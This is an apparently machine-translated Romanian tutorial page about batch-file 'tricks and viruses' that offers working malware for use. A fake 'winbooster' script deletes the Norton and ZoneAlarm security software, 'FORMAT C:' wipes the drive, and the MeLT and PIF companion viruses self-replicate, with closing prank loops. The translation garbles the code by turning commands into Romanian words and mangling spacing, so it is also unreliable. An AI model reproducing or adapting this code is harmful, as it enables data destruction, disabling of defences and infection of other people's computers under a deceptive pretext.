Trucuri și Virusuri în lot: 3 pași

2024 Autor: John Day | [email protected]. Modificat ultima dată: 2024-01-30 11:46

Cum se face o farsă și viruși reali în BATCH Notă: Nu sunt responsabil pentru daunele pe care le faceți computerului computerului altcuiva Notă: Când doriți să salvați fișierul, ar trebui să îl salvați ca orice.bat

Pasul 1: Viruși reali (simpli)

primul: copiați codul ******************************************* ************** @ echo bun venit la winbooster de ELECTROfun @ echo dacă doriți ca computerul să fie mai rapid, ar trebui să faceți pașii următori @ pause cd / c: dir dir c: / progra ~ 1 / norton ~ 1 @echo acum ar trebui să tastați y și apăsați enter @pause del c: / progra ~ 1 / norton ~ 1 @pause c: dir @pause @dir c: / progra ~ 1 dir c: / progra ~ 1 / zonea ~ 1 / zonealarm del c: / progra ~ 1 / zonea ~ 1 / zonealarm @echo ok now your computer is "REALY!" Rapid: ieșiți din ************************************************ * Notă: salvați fișierul orice doriți.bat Notă: orice este după @echo poate fi schimbat (puteți scrie orice doriți) Al doilea: *************** culoare 02FORMAT C: ***************

Pasul 2: Viruși reali (avansați)

1. Cel mai puternic ******************* @ dacă nu '% 0 ==' dacă '% _melt% ==' merge la meltbeg:: ---- fictiv gazdă -------- @ echo offecho Hello World!:: ---- end dummy host ---- @ go MeLTend [MeLT_2a]: MeLTbeg @ echo off% _MeLT% if '% 1 ==' MeLT mergi MeLT% 2dacă nu există% comspec% set comspec =% _ MeLT% comandă% comspec% / e: 5000 / c% 0 MeLT virset MeLTcl =% 1% 2% 3% 4% 5% 6% 7% 8% 9call% 0 MeLT rhset _MeLT = set MeLTcl = mergi MeLTend: MeLTrhset _MeLT = x% 0% MeLTcl%: MeLTvirset MeLTH =% 0dacă nu există% _MeLT %% temp% / nul set temp =% tmp% dacă există% temp% / MeLT_2a merge MeLTrun% 0 MeLT fnd. % path%: MeLTfndshift% _MeLT% if '% 2 ==' exit MeLTset MeLT =% 2 \% MeLTH%.batif not exist% MeLT% set MeLT =% 2 \% MeLTH% if not exist% MeLT% set MeLT = % 2% MeLTH%.batif nu există% MeLT% set MeLT =% 2% MeLTH% dacă nu există% MeLT% merge MeLTfndfind "MeLT"% temp% / MeLT_2aattrib% temp% / MeLT_2a + h: MeLTrun% MeLTH% MeLT s…% path%: MeLTsshift% _MeLT% if '% 2 ==' exit MeLTfor %% a in (% 2 / *. bat% 2 *.bat) sunați% MeLTH% MeLT inf %% agoto MeLTs: MeLTinffind / i "MeLT" nulif not errorlevel 1 go MeLTnoecho @if not '%% 0 ==' if '%% _ melt %% ==' go meltbeg> MeLT.ttype% 3 >> MeLT.techo. >> MeLT.ttype% temp% / MeLT_2a >> MeLT.tmove MeLT.t% 3> nulexit MeLT: MeLTact - textul ecranului flash-melt apoi readus la normalecho e 100 BA D0 07 BB 00 B8 8E C3 8B CA 33 FF 26 8B 05 FE> MeLT.techo e 110 C0 FE C4 26 89 05 47 47 E2 F2 FE 06 24 01 75 E8 >> MeLT.techo e 120 B4 4C CD 21 00 >> MeLT.techo g >> MeLT.tdebugnuldel MeLT.texit MeLT: MeLTnoset MeLTC =% MeLTC% 1if% MeLTC% == 1111111111 merge la MeLTact: MeLTend ********************************** ******** 2. Acesta este un virus care „infectează” fișierele PIF, folosit de Windows pentru a rula programe DOS. Funcționează prin crearea loturilor ascunse care conțin copii ale acestuia, apoi modificarea fișierului PIF, astfel încât lotul însoțitor să ruleze mai întâi. După executarea companionului, acesta rulează programul gazdă original, al cărui nume este codificat în companion. Fișierele pif sunt marcate astfel încât să nu fie re-infectate. Doar PIF-urile sunt afectate, nu se fac modificări la programele infectate. Pentru a „vindeca”, utilizați PIFEDIT pentru a restabili numele fișierelor originale, apoi ștergeți fișierele ascunse. ****************************** *************** @ echo off:: host file name … set pifvo = LIST. COM:: loop dispatcher … if '% 1 ==' PiFV go PiFV_% 2:: run the virus! set _PiFV = if not exist% comspec% set comspec = C: / COMMAND. COM% _PiFV %% comspec% / e: 5000 / c% 0 PiFV go> nulif exist PiFV! del PiFV!:: rulați setul de gazde PiFVcl =% 1% 2% 3% 4% 5% 6% 7% 8% 9call% 0 PiFV hstset PiFVo = set PiFVcl =:: verificați activarea … ecou. | data | găsiți / i "sat"> nul. PiFVif errorlevel 1 go PiFV_endecho. | time | find "7"> nul. PiFVif errorlevel 1 go PiFV_msgset PiFV = echocls% _PiFV %% PiFV%.% PiFV% A existat odată un Otter numit Oscer% PiFV % Cine a pretins că știe să facă apă.% PiFV% "Nu mai sunt diguri", a spus el, "folosește-mi apa în loc!" PiFV_msgecho [PiFV] de WaveFuncgoto PiFV_end: PiFV_hst% PiFVo%% PiFVcl% merge PiFV_end: PiFV_goset PiFVh =% 0dacă nu există% PiFVh% set PiFVh =% 0.batif nu există% PiFVh% exitfor %% a în (*). apelează% 0 PiFV inf %% aexit PiFV: PiFV_infset PiFVp =% 3:: obține numele fișierului victimei și marcajul infecției:: din fișierul PIF folosind debug … dacă există PiFV! Goto PiFV_1echo m 124, 162 524> PiFV! echo e 100 '@set fn =' >> PiFV! echo m 524, 562 108 >> PiFV! echo n pifv $.bat >> PiFV! echo rcx >> PiFV! echo 47 >> PiFV! Echo w >> PiFV! Echo m 55E, 561 108 >> PiFV! Echo e 10C 0 >> PiFV! Echo n pifv $$. Bat >> PiFV! Echo rcx >> PiFV! Echo 10 >> PiFV! Echo w >> PiFV! Echo q >> PiFV!: PiFV_1debug% PiFVp% nulcall PiFV $ set PiFVn =% fn% call PiFV $$ set PiFVi =% fn% del PiFV $ ?. bat:: pifvn = orig filename:: pifvi = marker de infecție:: pifvp = numele fișierului pif:: pifvh = fișierul liliac însoțitor:: sări peste pifs infectați sau „goi” … dacă „% PiFVi% ==” PiFV merge PiFV_endif”% PiFVn% ==” merge la PiFV_end:: don't shadow command.com (be nice) echo% PiFVn% | find / i "command"> nulif not errorlevel 1 go PiFV_end:: infectable - create a companion batch …:: (următorul cod elimină extensia) echo e 100 e8 16 00 b4 08 cd 21 3c 00 74 0c 3c 2e 74 08 88> PiFV $$ echo e 110 c2 b4 02 cd 21 eb ec cd 20 ba 21 01 b4 09 cd 21 >> PiFV $$ echo e 120 c3 73 65 74 20 66 6e 3d 24 00 >> PiFV $$ echo n pifv $.com >> PiFV $$ echo rcx >> PiFV $$ echo 2a >> PiFV $$ echo w >> PiFV $$ echo q >> PiFV $$ debugnulecho% PiFVn% | PiFV $> PiFV $$. Batcall PiFV $$ set PiFVb =% fn%.batdel PiFV $?. *:: pifvb = new batch name:: nu face umbra dacă comp are același nume ca hostif% PiFVo% ==% PiFVb% goto PiFV_endif exist% PiFVb% goto PiFV_endecho @echo off>% PiFVb% echo set pifvo =% pifvn% >>% PiFVb% găsi "PiFV">% PiFVb% attrib% PiFVb% + h::… și indicați PIF către companionecho e 15E „PiFV”, 0> PiFV $$ echo e 124 „% PiFVb%”, 0 >> PiFV $$ echo w >> PiFV $$ echo q >> PiFV $$ debug% PiFVp% nuldel PiFV $$:: Cred că am terminat! ieșire PiFV: PiFV_end:: mă întreb câte bug-uri are toate acestea în el? Un singur:: mod de a afla … ***************************************** **********

Pasul 3: Virus fars și Și un truc

1.prank virus ******************* culoare 02 @ echo offecho dir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / secho @ echo ************************* Notă: „Culoarea 02” este de a face Textul verde2.trick (cod matrice) ****** ************************** @ echo offcolor 02: startecho% random%% random%% random%% random%% random%% random% % random%% random%% random%% random%% random%% random%% random%% random% merge start *********************** ******************